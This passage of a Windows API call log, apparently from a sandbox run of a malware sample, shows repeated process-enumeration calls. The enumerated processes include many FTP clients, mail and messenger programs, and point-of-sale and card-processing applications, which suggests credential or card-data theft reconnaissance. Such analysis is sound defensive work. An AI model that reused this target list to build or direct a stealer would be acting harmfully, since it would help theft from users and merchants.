szExeFile="optionalso.exe")) returned 1 [0167.857] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0167.859] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0167.860] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0167.862] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0167.864] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0167.865] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0167.867] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0167.868] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0167.870] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0167.872] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0167.941] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0167.945] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0167.951] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0167.955] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0167.958] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0167.961] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0167.965] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0167.968] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0167.971] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0167.974] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0167.976] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0167.979] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0168.033] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0168.035] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0168.038] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0168.040] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0168.042] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0168.045] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0168.047] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0168.049] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0168.051] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0168.054] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0168.057] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0168.059] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0168.062] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0168.064] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0168.069] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0168.117] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0168.119] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0168.122] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0168.125] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0168.127] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0168.129] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0168.132] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0168.134] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0168.137] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0168.139] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0168.141] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0168.144] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0168.146] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0168.148] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0168.164] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0168.166] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0168.169] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0168.171] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0168.173] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0168.175] CloseHandle (hObject=0x1dfc) returned 1 [0168.175] Sleep (dwMilliseconds=0x64) [0168.300] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a88 [0168.322] Process32First (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.325] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0168.327] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0168.329] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.331] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0168.334] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.336] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0168.338] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0168.378] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0168.381] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.385] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.387] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0168.389] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.391] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.393] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.396] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.398] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.400] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.402] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.404] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0168.407] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0168.409] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.411] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0168.413] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.455] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0168.458] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0168.460] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0168.462] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, 